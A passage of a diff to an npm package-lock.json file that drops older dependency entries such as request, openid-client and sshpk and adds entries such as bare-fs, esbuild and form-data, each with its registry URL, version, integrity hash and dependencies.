"https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } + "bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "optional": true }, - "openid-client": { - "version": "5.4.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.3.tgz", - "integrity": "sha512-sVQOvjsT/sbSfYsQI/9liWQGVZH/Pp3rrtlGEwgk/bbHfrUDZ24DN57lAagIwFtuEu+FM9Ev7r85s8S/yPjimQ==", + "bare-fs": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.5.tgz", + "integrity": "sha512-1zccWBMypln0jEE05LzZt+V/8y8AQsQQqxtklqaIyg5nu6OAYFhZxPXinJTSG+kU5qyNmeLgcn9AW7eHiCHVLA==", "optional": true, "requires": { - "jose": "^4.14.4", - "lru-cache": "^6.0.0", - "object-hash": "^2.2.0", - "oidc-token-hash": "^5.0.3" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "optional": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "optional": true - } - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" } }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true + "bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "optional": true }, - "parse-domain": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/parse-domain/-/parse-domain-4.1.0.tgz", - "integrity": "sha512-zas79foMEsbMbIcJoPx26+NISWa3jTzZykOW9mXfRzvgadHvAHGd7qcCc1FbSWbD1I4qP71UWAxlTgu7Uq6IQg==", + "bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "optional": true, "requires": { - "is-ip": "^3.1.0", - "node-fetch": "^2.6.1", - "punycode": "^2.1.1" + "bare-os": "^3.0.1" } }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, + "bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", + "optional": true, "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" + "streamx": "^2.21.0" } }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" - }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, + "call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", "requires": { - "find-up": "^4.0.0" + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" } }, - "pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, + "clone-regexp": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/clone-regexp/-/clone-regexp-3.0.0.tgz", + "integrity": "sha512-ujdnoq2Kxb8s3ItNBtnYeXdm07FcU0u8ARAT1lQ2YdMwQC+cdiXX8KoqMVuglztILivceTtp4ivqGSmEmhBUJw==", "requires": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } + "is-regexp": "^3.0.0" } }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, + "combined-stream": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" + "delayed-stream": "~1.0.0" } }, - "psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" - }, - "punycode": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", - "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==" - }, - "pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true + "convert-hrtime": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/convert-hrtime/-/convert-hrtime-5.0.0.tgz", + "integrity": "sha512-lOETlkIeYSJWcbbcvjRKGxVMXJR+8+OQb/mTPbA4ObPMytYIsUbuOE0Jzy60hjARYszq1id0j8KgVhC+WGZVTg==" }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", + "debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } + "ms": "^2.1.3" } }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true + "delayed-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, - "resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, + "dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", "requires": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" } }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, + "end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", "requires": { - "resolve-from": "^5.0.0" + "once": "^1.4.0" } }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true + "es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==" }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true + "es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==" }, - "rfc4648": { - "version": "1.5.2", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.2.tgz", - "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==" + "es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "requires": { + "es-errors": "^1.3.0" + } }, - "safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==" + "es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "requires": { + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" + } + }, + "esbuild": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.25.5.tgz", + "integrity": "sha512-P8OtKZRv/5J5hhz0cUAdu/cLuPIKXpQl1R9pZtvmHWQvrAUVd0UNIPT4IB4W3rNOqVO0rlqHmCIbSwxh/c9yUQ==", + "dev": true, + "requires": { + "@esbuild/aix-ppc64": "0.25.5", + "@esbuild/android-arm": "0.25.5", + "@esbuild/android-arm64": "0.25.5", + "@esbuild/android-x64": "0.25.5", + "@esbuild/darwin-arm64": "0.25.5", + "@esbuild/darwin-x64": "0.25.5", + "@esbuild/freebsd-arm64": "0.25.5", + "@esbuild/freebsd-x64": "0.25.5", + "@esbuild/linux-arm": "0.25.5", + "@esbuild/linux-arm64": "0.25.5", + "@esbuild/linux-ia32": "0.25.5", + "@esbuild/linux-loong64": "0.25.5", + "@esbuild/linux-mips64el": "0.25.5", + "@esbuild/linux-ppc64": "0.25.5", + "@esbuild/linux-riscv64": "0.25.5", + "@esbuild/linux-s390x": "0.25.5", + "@esbuild/linux-x64": "0.25.5", + "@esbuild/netbsd-arm64": "0.25.5", + "@esbuild/netbsd-x64": "0.25.5", + "@esbuild/openbsd-arm64": "0.25.5", + "@esbuild/openbsd-x64": "0.25.5", + "@esbuild/sunos-x64": "0.25.5", + "@esbuild/win32-arm64": "0.25.5", + "@esbuild/win32-ia32": "0.25.5", + "@esbuild/win32-x64": "0.25.5" + } }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" + "escape-string-regexp": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-5.0.0.tgz", + "integrity": "sha512-/veY75JbMK4j1yjvuUxuVsiS/hr/4iHs9FTT6cgTexxdE0Ly/glccBAkloH/DofkjRbZU3bnoj38mOmhkZ0lHw==" }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true + "fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==" }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, + "form-data": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", "requires": { - "shebang-regex": "^3.0.0" + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" } }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true + "function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true + "function-timeout": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/function-timeout/-/function-timeout-0.1.1.tgz", + "integrity": "sha512-0NVVC0TaP7dSTvn1yMiy6d6Q8gifzbvQafO46RtLG/kHJUBNd+pVRGOBoK44wNBvtSPUJRfdVvkFdD3p0xvyZg==" }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true + "get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "requires": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + } + }, + "get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "requires": { + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" + } }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true + "gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==" }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true + "has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==" }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, + "has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" + "has-symbols": "^1.0.3" } }, - "sprintf-js": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.2.tgz", - "integrity": "sha512-VE0SOVEHCk7Qc8ulkWw3ntAzXuqf7S2lvwQaDLRnUeIEaKNQJzV6BwmLKhOqT61aGhfUMrXeaBk+oDGCzvhcug==" - }, - "sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", + "hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "dependencies": { - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - } + "function-bind": "^1.1.2" } }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, + "hpagent": { + 